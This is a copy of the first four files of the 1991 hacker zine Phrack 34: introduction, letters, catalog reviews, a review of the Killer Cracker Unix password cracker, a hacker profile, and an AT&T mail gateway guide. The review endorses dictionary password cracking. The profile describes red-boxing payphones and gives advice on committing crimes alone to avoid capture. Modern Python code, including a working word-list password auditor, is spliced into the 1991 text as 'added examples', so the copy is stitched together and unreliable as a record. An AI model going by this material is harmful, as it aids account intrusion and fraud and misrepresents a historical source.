==Phrack Inc.==

Volume Three, Issue Thirty-four, File #1 of 11

Issue XXXIV Index
__________________

P H R A C K   3 4

October 13, 1991
__________________

~Technology for Survival~

Welcome back to Phrack Inc. From now on, the editorship will consist of Crimson Death and Dispater. We have decided to join both our forces and pool our assets to make Phrack even better. We will have accounts at various Internet sites; however, all file submissions should be mailed to phracksub@stormking.com. If you do not have access to the Internet, give Free Speech BBS a call. Crimson Death will take it from there.

Special thanks this month goes out to Night Ranger for being a great help! Also thanks to Inhuman and Laughing Gas for taking the time to submit material.

Phrack has never really had a distribution BBS, but you can always get it on the Internet at EFF.ORG or CS.WIDENER.COM. Off the Internet, the BBS distribution will be from Free Speech BBS. Below is a list of a few other boards that carry all the Phracks.

Free Speech BBS       (618) 549-4955
Blitzkreig BBS        (502) 499-8933
Digital Underground   (812) 941-9427
Pyrotechnic's Pit     (407) 254-3655

We would also like to thank the nameless numbers of BBS's out there that carry Phrack Inc. without their names being listed here!

In this issue of Phrack Inc. we are starting a "letters to the editor" section called "Phrack Loopback." Any questions, comments, corrections, or problems that you the reader would like to air with Phrack publicly will be answered there. Loopback will also contain information such as reviews of other magazines, catalogs, hardware, and software. With Loopback we hope to make Phrack Inc. more interactive with our readers.

This month we had an opportunity to interview one of our "hacker heroes", The Disk Jockey. We are also trying to "liven up" Phrack World News a little by adding some editor's comments about recent news topics. If we get a positive response, we will continue doing this. Hopefully you will respond with your views as well.

Your Editors,

Crimson Death              Dispater
cdeath@stormking.com       phracksub@stormking.com

===============================================================================

COMMENTS INSERTED BY SERVER:

As the server of the Phrack Mailing List, I'd like to get a few words in. First, since I am currently a VERY DUMB list server, I am currently not very interactive. I am working with the system administrators and owners to get an interactive "LISTSERV" onto this machine.

I would also like to know if anyone can get me access to an IP address via SLIP at an Internet site VERY CLOSE to the Newburgh/Poughkeepsie, NY area.

Another thing I could use is a Phrack SubBot for IRC. Something small that would allow you to get information on the release date of the next Phrack, add your name to the Mailing List, find out the Index of the last issue and such. I can handle awk, perl and 'C'. An IRC connection (not the server software) would also be interesting.

Another thing I heard of and am interested in is something that might start a separate list. There is a game where you write a program to make a robot to fight another programmed robot. You run these against each other to see who will win. You can then modify the code to try again. It needs to be compatible with an IBM Risc/6000 running AIX 3.1.5 running patch #2006.

Help is also needed with SENDMAIL.CF configuration and etc. Basically, if you have something that the SERVER might be interested in, please mail "server@stormking.com".

Also, if someone mentions that they are not receiving a copy when they asked to subscribe, anything that DOES bounce back here is automatically deleted. For example, if something comes back from SUSY.THUNDER@POKER.LASVEGAS.NV.CA (Susan Lynn Headley) and I am told that POKER.LASVEGAS.NV.CA is not connected to CYBERPUNK.HAFNER.MARKOFF.NY.NY, I will NOT attempt to resolve the message.

Storm King List Server

===============================================================================
_______________________________________________________________________________

Phrack XXXIV Table of Contents
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 1. Introduction to Phrack 34                    by Crimson Death & Dispater
 2. Phrack Loopback                              by The Phrack Staff
 3. Phrack Prophile of The Disk Jockey           by The Disk Jockey & Dispater
 4. The AT&T Mail Gateway                        by Robert Alien
 5. The Complete Guide to Hacking WWIV           by Inhuman
 6. Hacking Voice Mail Systems                   by Night Ranger
 7. An Introduction to MILNET                    by Brigadier General Swipe
 8. TCP/IP: A Tutorial Part 2 of 2               by The Not
 9. Advanced Modem-Oriented BBS Security         by Laughing Gas & Dead Cow
10. PWN/Part01                                   by Dispater
11. PWN/Part02                                   by Dispater
_______________________________________________________________________________

==Phrack Inc.==

Volume Three, Issue Thirty-four, File #2 of 11

^[-=:< Phrack Loopback >:=-]^

By: The Phrack Staff

Phrack Loopback is a forum for you, the reader, to ask questions, air problems, and talk about whatever topic you would like to discuss. This is also the place The Phrack Staff will make suggestions to you by reviewing various items of note: magazines, software, catalogs, hardware, etc.
_______________________________________________________________________________

What's on Your Mind
~~~~~~~~~~~~~~~~~~~

>Date: Fri, 20 Sep 91 01:22:30 -0400
>To: phracksub@stormking.com
>
>So what exactly DID happen to Agent Steal? There was a small blurb in
>PWN for 33, but gave no details. Why was he arrested, what was confiscated,
>and how long will he probably be away for.
>
>Mind you, this is a tragic loss, since Agent Steal was a gifted hacker and
>had a whole lotta balls to boot.
>
>    Sincerely,
>
>    A concerned reader

To be honest, it would not be in his best interest to say much about his case before his trial. What we have written comes from a very reliable source. Some people close to him are denying everything.
This is most likely to keep from happening to him what happened to people like Mind Rape, who have basically been "convicted" by the media.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

>From: Drahgon
>Date: Thu Sep 26 06:00:35 1991
>
>    Dear Dispater,
>
>    My name is Drahgon unless, of course. I have several things to blow
>    from my mind here....
>
>    How is the progress of Phrack 33? I am not really up on all the
>    hoopla surrounding it, but I am curious. In high school I often
>    published "underground newsletters" about the manufacture of drugs and
>    explosives, etc. The computer underground is a new territory for me
>    and I have just begun. I would love to hear about your mag....I would
>    perhaps have something to offer.

We at Phrack Inc. are here to publish any kind of information you the reader are interested in. We, unlike many other people out there, will not judge you or call you a "lamer" if you submit something to us that we might think is a little elementary. We might not necessarily run it in Phrack, but we aren't the kind of people that are going to call you up in the middle of the night on an Alliance Teleconference and harass you. In fact, there are many text files out there that are out-dated and need to be corrected! Simply put, if you are interested in it, there are probably two hundred others out there that are afraid to ask, because some El1Te person will call them "stupid." Here at Phrack Inc., WE ARE NOT El1Te, WE ARE JUST COOL AS HELL! We want to help everyone in their quest for knowledge.

>    Secondly, I want to start my own bbs up here in my town. This
>    town is dead, but there is still a glint of life, it needs to be
>    kindled. There are currently no BBS's up here that carry information
>    of an "alternative nature", and there are in fact laws that prevent
>    them from springing up. (whatever happened to freedom of the press?),
>    Well, anyway, I would like to know if you would support a BBS of
>    mine, and maybe you could give me some pointers...
>
>    Thanx ALOT
>    DRAHGON

That's great! We're always glad to see new faces that are truly interested in helping people by becoming a source of information. If you have any questions about BBS's you should ask the expert, Crimson Death. He will be more than happy to help you out.
_______________________________________________________________________________

Corrections
~~~~~~~~~~~

In V.3, I#33, File 9 of 13, there was an error. R5 should have been a 10K pot and not just a resistor. The corrected part of the schematic should look like this:

[ASCII schematic of the corrected circuit (IC1 556 timer, S1-S3, R1-R9, C1-C2, D1, +9V supply); the drawing's layout is not recoverable in this copy.]
_______________________________________________________________________________

Hardware Catalog Review
~~~~~~~~~~~~~~~~~~~~~~~
by Twisted Pair

You can never get enough catalogs. One reason is because you never know what off-the-wall parts you'll be needing. From time to time I'll be reviewing catalogs so you'll be able to learn where to get the really good stuff as far as computer equipment, telco test equipment, and IC chips are concerned. In this issue, we study two of them...

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

SYNTRONICS
2143 Guaranty Drive
Nashville, Tennessee 37214
(615) 885-5200

I recently saw an issue of "Nuts and Volts" magazine which had a Syntronics ad in it. I sent the dollar they wanted for a catalog. Apparently, demand for the catalogs was so great that they're having some more printed up.
They sent my dollar back with an explanation and a partial photocopy of the catalog. An associate on the left coast and I want to build a tone decoder and have been looking for a particular chip for a long time. We found it in this catalog. It's an SSI-202 Tone Decoder IC for $12. Not bad for a chip I was unable to locate in about 30 catalogs I've searched through. A fellow phreak was told by a zit-faced Radio Shack employee over their 800 number, "They had only 3 left and they would cost $100 each." I don't think so.

Syntronics is selling plans for an interesting device you hook up to the phone line. With it you can call it and turn on any one of three 110VAC outlets. To turn them on you use simple DTMF commands. This would be useful for turning on your computer, modem, room bug, security lights, etc. from a remote location. Plans for this device cost $9 and you'd need the above-mentioned IC chip to build it with.

Syntronics carries:
-------------------
Project Plans
Software
Unusual Hardware
Kits
IC's
Transistors

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Telephone International            (The marketplace for
PO BOX 3589                         communications equipment,
Crossville, Tennessee 38557         services, and employment)
(615) 484-3685

This is a monthly publication you can receive free. It's usually about 30 pages printed on large yellow-pages paper. To save yourself the $50 a year first-class yearly subscription rate, just tell them you're a telephone technician. Tell them you need to often buy PBX's, Terminal Blocks, etc. They'll send it to you free, because you're special!

Here's a sampling of stuff you can find in there:
-------------------------------------------------
A Complete Digital Switching System with 3200 lines on a flatbed trailer !!!!!!
Repaired Payphones
Optical Fiber xmission system
Operator's Headsets
CO Digital multiplexers
AT&T teletypes
Used FAX machines
AT&T Chevy bucket trucks
Hookswitches
Digital error message announcers
Central Office Coin System Processor Cards

Telephone International lists a bunch of telco seminars happening around the country on their "Calendar of Events" page. They also list conferences for security organizations, including dates and phone numbers you'd need to register.

That's it for this edition of Hardware Hacking. Keep an eye out for good suppliers to the Phreak world. Pass'em along to Phrack.

-T_W-I_S-T_E-D_ -P_A-I_R-
_______________________________________________________________________________

A Review of the Killer Cracker V.7.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by The Legion of d0oDez

As every hacker worth his/her salt knows, the Unix operating system has major security problems when it comes to its passwd file. Some may think this is good, since information should not be hoarded; others think information should be kept by the people who can use it best, the ones with the most money. The passwd file is the Unix file that stores the user information, which includes username, home directory, and passwords among others. I will not go into the basics of Unix as this is not a Unix how-to-hack file. It is a review of Killer Cracker 7.0 (aka KC7).

KC7 is a Unix password hacker that is portable to most machines. It is written by Doctor Dissector and is free software, as the terms of the GNU General Public License (by the Free Software Foundation) state. Version 7.0 is not the latest version but seems to be the best to use. It is dated 6/1/91, which makes it pretty recent. 8.0 is rumored to be out but we have not had the opportunity to review it yet as we are still testing it. ;-)

The best thing about KC7 is that you can run it on most machines that will run C programs, which happens to include MS-DOS machines. With this in mind, you can now let your PC do the work of hacking passwords in the privacy of your own home without having to use a mainframe, which might be a bit risky.

The distribution copy of KC7 comes with the following files:

KC.EXE      -- MS-DOS executable
KC.DOC      -- Documents
Source.DOC  -- The source code to KC
KC.C        -- The Turbo C source code

And other files that pertain to DES and word files.

KC7 works by taking an ASCII file composed of words and encrypting them so that it can compare the encrypted words with the passwords in the PASSWD file. It is pretty efficient, but if running on an MS-DOS system you will probably want to use a machine that is at least a 286-12 or higher. The time to complete a PASSWD file is directly proportional to how large the file is (the PASSWD file must be less than 64K on an MS-DOS machine) and what speed of machine you are using.

There are options which allow you to take words (aka guesses) from other sources as well as a words file. These sources can be words from the PASSWD file such as the username, single characters, and straight ASCII characters such as DEL or ^D. It can also manipulate the guesses in various ways which might be helpful in guessing passwords.

Another useful option is the RESTORE function. KC7 has the ability to allow the user to abort a crack session and then resume cracking at a later date. This is very nice since one does not always have the time nor patience to crack a 50k passwd file without wanting to use his/her machine for other uses, such as trying out new passwords.
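The loop the review describes (take a word, encrypt it with each account's salt, compare with the stored field), written as an added example that is not KC7's code: a passwd audit a sysadmin runs against their own file. It goes a step beyond the text by grouping accounts that share a salt so each word is hashed once per distinct salt, which is why the word-major order is cheaper than the per-username order. DES crypt(3) is replaced by a labelled stand-in hash so the block runs anywhere, and the passwd file and word list are constructed sample data.

```python
"""Word-major dictionary audit of a Unix passwd file (added example, not KC7)."""
import hashlib
from collections import defaultdict

FIELDS = ("name", "hash", "uid", "gid", "gecos", "home", "shell")
WORDLIST = ["password", "letmein", "wombat", "phrack"]   # constructed sample list


def parse_passwd(text):
    """Parse passwd(5) lines (7 colon-separated fields) into dicts."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != len(FIELDS):
            raise ValueError(f"malformed passwd line: {line!r}")
        entries.append(dict(zip(FIELDS, fields)))
    return entries


def stand_in_crypt(word, salt):
    """Stand-in for crypt(3): 2-char salt + 11 hash chars = 13 chars, the shape
    of a traditional DES field. Constructed for this example; NOT DES."""
    digest = hashlib.sha256((salt + word).encode()).hexdigest()
    return salt + digest[:11]


def username_guesses(name):
    """Per-account guesses derived from the username, as KC7's options allow."""
    return [name, name[::-1], name.upper(), name.capitalize(), name + "1"]


def audit(entries, wordlist, crypt_fn=stand_in_crypt):
    """Return (findings, crypt_calls). findings maps username -> matched guess
    ('' for an empty password field). Accounts are grouped by salt, so in the
    word-major pass each word is hashed once per distinct salt, not per user."""
    calls = 0

    def crypt(word, salt):
        nonlocal calls
        calls += 1
        return crypt_fn(word, salt)

    findings = {}
    by_salt = defaultdict(list)
    for e in entries:
        h = e["hash"]
        if h == "":
            findings[e["name"]] = ""        # no password at all: always a finding
        elif h in ("x", "*", "!") or len(h) != 13:
            continue                        # shadowed, locked, or not a crypt(3) field
        else:
            by_salt[h[:2]].append(e)        # first two chars of the field are the salt

    # cheap per-account guesses first (one hash each)
    for salt, users in by_salt.items():
        for e in users:
            for g in username_guesses(e["name"]):
                if crypt(g, salt) == e["hash"]:
                    findings.setdefault(e["name"], g)

    # word-major pass: outer loop over words, one hash per distinct salt
    for word in wordlist:
        for salt, users in by_salt.items():
            h = crypt(word, salt)
            for e in users:
                if e["hash"] == h:
                    findings.setdefault(e["name"], word)
    return findings, calls


def build_sample_passwd():
    """Constructed sample file (not real accounts); hashes come from the
    stand-in crypt so the audit can match them. alice and dave share a salt."""
    rows = [
        ("root",  stand_in_crypt("k7#Qp!9z", "Xy"), "0",   "0",     "root",  "/",           "/bin/sh"),
        ("alice", stand_in_crypt("wombat", "Ab"),   "100", "100",   "Alice", "/home/alice", "/bin/csh"),
        ("dave",  stand_in_crypt("wombat", "Ab"),   "101", "100",   "Dave",  "/home/dave",  "/bin/sh"),
        ("carol", stand_in_crypt("Carol", "Cd"),    "102", "100",   "Carol", "/home/carol", "/bin/sh"),
        ("bob",   "",                               "103", "100",   "Bob",   "/home/bob",   "/bin/sh"),
        ("sync",  "*",                              "4",   "65534", "sync",  "/bin",        "/bin/sync"),
        ("erin",  "x",                              "104", "100",   "Erin",  "/home/erin",  "/bin/sh"),
    ]
    return "\n".join(":".join(r) for r in rows) + "\n"


if __name__ == "__main__":
    found, n = audit(parse_passwd(build_sample_passwd()), WORDLIST)
    for user, word in found.items():
        label = "EMPTY PASSWORD" if word == "" else f"matched guess {word!r}"
        print(f"{user}: {label}")
    print(f"{n} hash operations")
```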
We have found that the best way, as suggested by the author, to crack is by using the default method, which is to crack by word and not by username. You will understand when you get a hold of the software. You can get KC7 at most H/P oriented BBS's, as everyone thinks he/she is a Unix wizard nowadays.

Overall, KC7 is an excellent program and we suggest it to all Unix hackers. We also hope you have enjoyed this file and we look forward to bringing more interesting reading to your terminal. Until then.... Happy hacking.
_______________________________________________________________________________

==Phrack Inc.==

Volume Three, Issue Thirty-Four, File #3 of 11

-*[ P H R A C K   XXXIV   P R O P H I L E ]*-

-=>[ Presented by Dispater ]<=-

The Disk Jockey
~~~~~~~~~~~~~~~

Handle: The Disk Jockey (over 10 years now...)
Call him: Doug
Reach him: douglas@netcom.com
Past handles: None
Handle origin: Selected it way back in the Apple days, when it was hip to have a hardware-related name.
Date of Birth: 12/29/67
Age at current date: 23
Approximate Location: Silicon Valley
Height: 6'1"
Weight: 220 lbs.
Eye color: Green
Hair Color: Blond/brown
Education: Cornell, Univ of Michigan, Stanford, and a slew of other schools that I had the opportunity to attend. What started out as a strong belief in law became so jaded that I fell back on Comp Sci. Still wake up in the middle of the night yelling "NO!, NO!" Also have a wallpaper degree in Psychology.
Computers: First: Apple //. Presently: several. Mac IIfx, 386/33, and several others that I can't seem to get rid of...

-------------------------------------------------------------------------------

The Story of my Hacking Career
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I was lucky enough to be able to get my hands on computers early, back in the days of the PET and the TRS-80. Although we poke fun at a Trash-80 now, at the time I was completely fascinated by it. Remember Newdos/80, LDOS, and utilities like SuperZap?
Things started really rolling after a friend introduced me to the Apple. Although I never fell into the stereotype of being a computer "nerd" (don't we all like to think that?), compared to the redundancy of normal schoolwork, learning about the Apple was a new and unexplored world. Unlike most of the other computer "types", I didn't read science fiction, didn't have any social problems, and thought looking at girls was more enjoyable than talking about hardware. Well, depending on the hardware. (ha-ha!)

"Cracking" Apple software was of course the next logical step. The 6502 was a wonderful chip, and easy to learn. Copy-cards and other "hacked" hardware were becoming findable and it was getting to the point that the only goal was to get your hands on pre-release software. Before I had entered the "modem" world, friends had a network of other people across the country and traded things by mail.

Of course the whole world changed when I picked up a 300 baud modem. Suddenly there was the communication and knowledge that I had been hungry for. People wrote text files on just about everything imaginable. What is the president's phone number? How can I call the pope? How can I make lowercase on my Apple II? What are the routing numbers for boxing to the Eastern Bloc countries?

Codes were never much of an interest. The systems that ran them, however, were quite interesting. As technology advanced, SCCs started using sophisticated AI techniques to detect any kind of abnormal usage instantly. Codes used to last several months; now they only lasted a few hours. Boxing, however, was a little more elegant and was the flashy way to call your friends.

Even before I had ever heard of boxing or phreaking, I enjoyed the benefits of what we now know as a "red box". While in boarding school, I noticed that a somewhat broken phone emitted obscenely loud "beeps" when you dropped in a quarter. I took a little micro-recorder and recorded myself dropping about $5.00 into the phone. When I played this back into the telephone, the telco thought I was actually dropping change in the machine! I was able to call my girlfriend or whomever and speak for hours. Now most payphones mute those tones so they are barely audible, if at all.

Local user groups were a good place to pick up software, legal and otherwise. Remember those damn "CLOAD" magazine tapes for the TRS-80? 80-Micro magazine? The early 80's was the time of the hardware hacker - anything bizarre you wanted you had to make yourself, since it wasn't available otherwise. Now you can call any of a slew of 800 numbers, give them your credit card number (!) and have it on your doorstep the next day. I think part of the problem of the "new generation" of hackers, phreakers, warez kids, etc., is that they never had the experience with low-level stuff and actually having to get into the hardware to get what they wanted. Their only programming experience is coming from school, which gives a shallow and usually totally impractical background for the "real world".

My eventual disgust with the pirate world came when products such as "Pirate's Friend" came out, allowing people to sector edit out my name and insert theirs. I had spent quite a lot of time trying to find new software, and enjoyed the ego stroke of having my name passed around. I had a lot of respect for book authors that were plagiarized after that...

About the industry
~~~~~~~~~~~~~~~~~~

The computer industry in general is interesting. Working in it, I hope I'm justified to speak about it. Getting a job is quite easy, since the technology is changing so much; unless it is in something that will be around for some time, you can usually pick up a job by just knowing the latest developments, the buzzwords, and having good "chemistry". In the valley many firms realize that colleges don't really teach you much in the way of practical knowledge. At best, they give you the opportunity to try different types of machines.
It amazes me that HR departments in companies across the country won't even look at a resume unless the applicant has a college degree. Advanced degrees are a different matter and are usually quite applicable towards research, but your usual BA/BS variety? Nah. If you want to make a lot of money in this industry, all you need to do is get the reputation as a person who "gets things done" and have superior communication skills. You can write your ticket after that.

About legal issues
~~~~~~~~~~~~~~~~~~

Anyone who has ever read some of my later text files (1986, 1987) knows that I had no qualms about the legalities of beating an establishment. Although my line of morals was probably beyond where others placed theirs, I could always justify to myself damage or loss to an establishment, "beating the system", rather than hurting the individual. Although I am pretty right-winged in beliefs, I have a great distrust for the policing agencies.

Various memories
~~~~~~~~~~~~~~~~

Getting a call from my father while at school and being told that Control C had called him and relayed the message "Tell Doug the FBI are after The Disk Jockey. Get rid of everything and hide." To say I "cleaned house" would have been a gross understatement. I knew this was true; I, like many others, had just ridden on the false pretense that they would have better things to do than come after me. I later saw intelligence reports showing that I had been kept track of for some time. I was described as:

"Involved in some type of student-loan scam through creating fictitious college applicants at his school. Very violent temper, ruthless attitude. Breaks people's legs for money (TX). Owns a motorcycle and a European sedan. Nasty hacker."

Only a handful of people would know that I had a motorcycle, so it was somewhat upsetting that they had this kind of information on me. I later saw some of this same information in Michigan Bell Security's records. They also had the correct phone number for my place at Cornell, my parents' number, and even the number of some of my personal non-computer related friends.

SummerCon in 1987 was a fun experience. I had the opportunity to meet many of the people that I communicated with regularly, as well as wonder why people thought St. Louis was such a wonderful place. While there were a few socially "on-the-fringe" types, I was amazed that most of the other "hackers" didn't fit the usual stereotypes. They were just regular guys that had some above-average cleverness that allowed them to see the things that others couldn't.

By the time I was 20 years old, I had about $40,000 worth of credit on plastic, as well as a $10,000 line of credit for "signature loans" at a local bank. The credit system was something that seemed fun to exploit, and it doesn't take long to figure out how the "system" works. With that kind of cash available, however, it's tempting to go and buy something outrageous and do things that you wouldn't normally do if you had the cash. This country is really starting to revolve around credit, and it will be very hard to survive if you don't have some form of it. If more people were aware of how the credit systems worked, they might be able to present themselves in a better light to future creditors. I don't think that credit is a difficult thing to understand; I just had an unusual interest in understanding and defeating it. Perhaps this is something that my future text files should be about.

Getting busted
~~~~~~~~~~~~~~

On June 27, 1988 at 1:47am, I had just parked my car outside my apartment and was walking up to the door when I heard someone say "Doug?" I knew that no friend of mine would be visiting at that hour, so I knew my fate before I turned around. An FBI agent, State police detective and a local detective were walking up to me. "We have a warrant for your arrest."

Interestingly, they actually had several warrants, since they weren't sure what my name was. I was being arrested for 6 counts of "conspiracy to commit fraud". After being searched to make sure I wasn't carrying a gun, they asked if they could "go into my apartment and talk about things". Although I had completely "cleaned house" and had nothing to hide in there, I wasn't about to help out an investigation on me.

"Ah, I think I had better contact an attorney first."
"Is there one you can call right now?"
"Are you kidding? It's 2:00am!"

I was handcuffed and had my legs strapped together with a belt and was thrown in the back of a car. This was one of those usual government cars that you see in the movies with the blackwalls and usual hubcaps. Interestingly enough, the armrest of the car hid quite an array of radio equipment. Although pretty freaked out, I figured the best thing to do at that point was try to get some sleep and call the best attorney money could buy in the morning. Little did I know where I was being brought.

I was driven all the way to a small Indiana town (population 5,000) where a 16 year-old Wheatfield, Indiana boy had made the statement that he and I "agreed to devise a scam". Although nothing was ever done, merely planning it created the conspiracy charge. I figured that after my arraignment I could post bail and find an attorney. I had almost $10k in the bank and could probably find more if I needed it. I was sadly mistaken. The next day at my arraignment the charges were read and bail was set -- $150,000.00, cash only!

In a strange turn of events, the FBI decided to totally drop the case against me. The federal prosecutor figured it wasn't worth wasting his time and they jumped out. However, the Indiana state police were involved in my arrest and were angry that the FBI was dropping the case after they had invested so much time and money in the case, so they decided to pursue the case themselves.
There is so much friction between the FBI and state police that the FBI didn't even answer their letters when they tried to request information and data files on me. Funny.

I spent 6 months in a tiny county jail, missing the start and first semester of school. I was interrogated constantly. I never told on a soul and never made a statement about myself. I sat in jail daily, reading books and waiting for my court dates. Although I never expected it, nobody ever thanks you when you keep your mouth shut. I can't imagine that many people would sit in jail for a long time in order to save their friends. Perhaps it's a personal thing, but I always thought that although I doubt someone else would do it for me, I would never, ever tell anything on anyone else. I would never be responsible for someone else's demise.

It took a lot of money, and a lot of Friday nights of frustration, but I walked away from that incident without ever making a statement. It was at a time when my "roots" were deepest and I probably could have really turned in a lot of other people for my benefit, but it was at a time in my life where I could afford to miss some school and the integrity was more important to me. There were a lot of decisions that had to be made, and spending time in jail is nothing to be proud of, but I never backed down or gave in. It did provide the time for me to really re-evaluate who and what I was, and where I was going.

People I've known
~~~~~~~~~~~~~~~~~

Compaq
    Personal friend for some time now.

Control C
    Most likely the craziest guy I've ever met. Really nice guy.

Knight Lightning
    Would call me up in the middle of the night and want to discuss philosophical and social issues. Kind of guy I would probably get along with outside of computers as well.

Loki
    Friend since high school. Made a big splash in the h/p world, then disappeared from it. He and I (and Control C) drove to SummerCon together.

Shooting Shark
    Great guy who used to be into calling bridges and would yell "Hey, I'm paying for this!" Truly one of the only people that I ever knew that didn't do anything blatantly illegal. Most of our email was over the optimization of crypt.

The Mad Alchemist
    Sysop of Lunatic Labs, one of the only boards that I feel is worth the telephone call anymore. He has given me a lot of slack and runs a BBS that picks up some of the most obscure information. A sysop that others should be judged by.

Tom Brokaw
    Personal friend since childhood that stood by me through thick and thin, bailing me out of trouble time and time again. I can never thank him enough for being a true friend.

BBSs
~~~~

More than I could mention here. A few more recent notables --

Atlantis
    Although run on an Apple, the Lineman had this system so slick and customized that it became the standard that a lot of the PC based boards were created with. It was the first real "clearinghouse" for text files.

Free World II
    Run by Major Havoc and myself, this was an incredibly robust system, and was one of the first to be run on a US Robotics HST. Although it was primarily a discussion board, the file areas offered some of the best files -- virtually no games, but about every real utility and the like.

Metal AE
    201-879-6668 - this was a true blue AE line that was around for like 5 or 6 years and was ALWAYS busy. Had all of the original cDc and other bizarre text files, occasionally some new Apple warez.

Lunatic Labs
    Still up and still great.

Metal Shop Private
    Perhaps one of the best boards of all time. Run by Taran King and had a healthy, yet secure userlog. It was a closed system; the only way to get on was to know somebody. Everyone on the system knew each other in some sense.

World of Cryton
    One of the first boards to have a "philter" and to really push the messages as far as codes, accounts, card numbers, etc. This was also the demise, along with many of the 414 hackers.
Misc
~~~~

2600 Magazine
    How could I not like a magazine that published articles I wrote? This really is a great magazine and anyone who is interested in computers, privacy, or cyber-issues in general should subscribe.

Fame...?
    Was in the movie "Hoosiers" (thanks for bringing that up, Shark!), even though I'm not a basketball fan. Met Dennis Hopper, etc. Went to school with a lot of famous people's kids. Most have some pretty serious problems. Be glad you are who you are.

Marriage...?
    I'm single and will do everything I can to stay that way. When people ask me about getting married I tell them that the idea of car payments scares me. I enjoy having girlfriends, but I've become too independent. I still run around at bars until sometimes 3:00am or so, but still manage to spend about 50 or 60 hours a week at work. Even if I cut out the bar scene, I wouldn't have much time to spend with someone else on a daily basis.

Advice
    If you ever get into doing illegal things, make sure you do them by yourself. Your chances of getting caught when you do things solo and resist the temptation to "brag" about them is minimal. When someone else knows about what you have done, it doesn't matter how good of a friend they are. If they get into trouble, you are going to be the sacrificial lamb when it comes to negotiating their freedom. Even the strongest-willed individuals seem to crumble when questioned by police. Groups are bad news. There are very few advantages to being in a group and all it does is increase your personal risk by multitudes. Cracking groups aren't nearly as dangerous, but they DO bring boards down. Look to the fate of groups such as LOD for examples of group fate. Lex Luthor, perhaps one of the most elusive and private hackers of all time, was the one to bring down the rest of the group. This was tough for me, as many of the members were people I talked with and could really feel for.
     Don't get discouraged in life if you feel that you are behind the rest because you don't come from a rich family or have the best equipment. I left home when I was 17 years old, keeping only minimal contact with my parents since then and lived life pretty well, using my abilities to "smooth talk" and pure enthusiasm to walk into about any job. Don't put people down -- everyone has something to teach you, even the bum on the street might be able to tell you how to make some free phone calls! There is a wealth of information to be found via Usenet, text files, or even your school or public library. Stay informed and well read.

Email
     I always enjoy hearing from people. Reach me via the Internet at douglas@netcom.com, or on Lunatic Labs BBS.
________________________________________________________________________________

==Phrack Inc.==

                 Volume Three, Issue Thirty-four, File #4 of 11

                       _________________________
                      ||                         ||
                      ||  The AT&T Mail Gateway  ||
                      ||                         ||
                      ||    December 19, 1990    ||
                      ||                         ||
                      ||     by Robert Alien     ||
                      ||_________________________||

The Internet Gateway
~~~~~~~~~~~~~~~~~~~~
The Internet Gateway provides Internet e-mail users with a method of communication to AT&T Mail. The Interconnect consists of various private email networks and uses an addressing format better known as Domain Addressing Service (DAS). A domain address consists of a user name, followed by an @ sign and/or % sign and a domain name, which is usually the system name.

Example:  jdoe@attmail.com

Sending Email to Internet Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To send email from the AT&T Mail Service to the Internet community use the UUCP addressing style.

Example:        internet!system.domain!username
Translates to:  internet!gnu.ai.mit.edu!jdoe

If you are sending e-mail to an Internet user whose e-mail address may be in the RFC 822 format (user@domain), you must translate the RFC address before sending your message to an Internet recipient.
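The translation rule above, and the % relay form the next examples show, written out as code. This is an added example, not part of the original file or of AT&T's gateway; it generalizes the % form to any number of hops (outermost host first), and the syntax checks on user and host names are this example's own assumption.

```python
"""Translate between RFC 822 addresses and the UUCP bang-path form the
AT&T Mail Internet gateway expects, following the rules in this file.

  user@a            -> internet!a!user
  user%b@a          -> internet!a!b!user      (the file's second example)
  user%c%b@a        -> internet!a!b!c!user    (generalized: route order)
  user@host.bitnet  -> internet!host.bitnet!user
  attmail.com!jdoe  <-> jdoe@attmail.com      (inbound UUCP style)
"""

import re

GATEWAY = "internet"           # leading hop on every outbound address (from the file)

# Assumed syntax checks: a host label is letters/digits/dots/hyphens, a user
# name is letters/digits/dot/underscore/hyphen.  Nothing with '!' '@' '%' or
# blanks gets through, so a malformed address fails loudly instead of being
# routed somewhere unexpected.
_LABEL = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]*$")
_USER = re.compile(r"^[A-Za-z0-9._-]+$")


def rfc822_to_uucp(address: str) -> str:
    """RFC 822 user@domain, with optional % relay hops, to a gateway bang path."""
    if address.count("@") != 1:
        raise ValueError(f"expected exactly one '@' in {address!r}")
    local, domain = address.split("@")
    hops = local.split("%")
    user = hops[0]
    # In user%c%b@a the message goes to a first, which forwards to b, which
    # forwards to c.  The % hops are written innermost-first, so reverse them
    # to get the order the message actually travels.
    route = [domain] + list(reversed(hops[1:]))
    if not _USER.match(user) or not all(_LABEL.match(h) for h in route):
        raise ValueError(f"malformed address {address!r}")
    return "!".join([GATEWAY] + route + [user])


def uucp_to_rfc822(path: str) -> str:
    """Inbound attmail.com!username form to username@attmail.com.

    Only the two-part form the file documents is accepted; longer bang
    paths are rejected rather than guessed at.
    """
    parts = path.split("!")
    if len(parts) != 2 or not _LABEL.match(parts[0]) or not _USER.match(parts[1]):
        raise ValueError(f"unsupported UUCP address {path!r}")
    return f"{parts[1]}@{parts[0]}"


if __name__ == "__main__":
    for a in ("jdoe@gnu.ai.mit.edu", "username%system2@system.domain", "user@host.bitnet"):
        print(f"{a:35} -> {rfc822_to_uucp(a)}")
    print(f"{'attmail.com!jdoe':35} -> {uucp_to_rfc822('attmail.com!jdoe')}")
```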
     username@system.domain             (Internet user's address)
     internet!system.domain!username    (to a UUCP address)

Example:        username%system2@system.domain   (Internet user's address)
Translates to:  internet!system.domain!system2!username

Sending Email From The Internet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To send email to the AT&T Mail Service, Internet users can choose either the RFC 822 or UUCP addressing style. The Internet recognizes attmail.com as the domain identifier for AT&T Mail when electronic messages are sent through the gateway. Although many Internet users choose to send e-mail using the RFC 822 addressing style, the UUCP style is also available on many UNIX systems on the Internet, but not every system supports UUCP. Below are examples of both addressing styles:

RFC 822 Addressing:  username@attmail.com
          Example:   jsmith@attmail.com

UUCP Addressing:     attmail.com!username
          Example:   attmail.com!jdoe

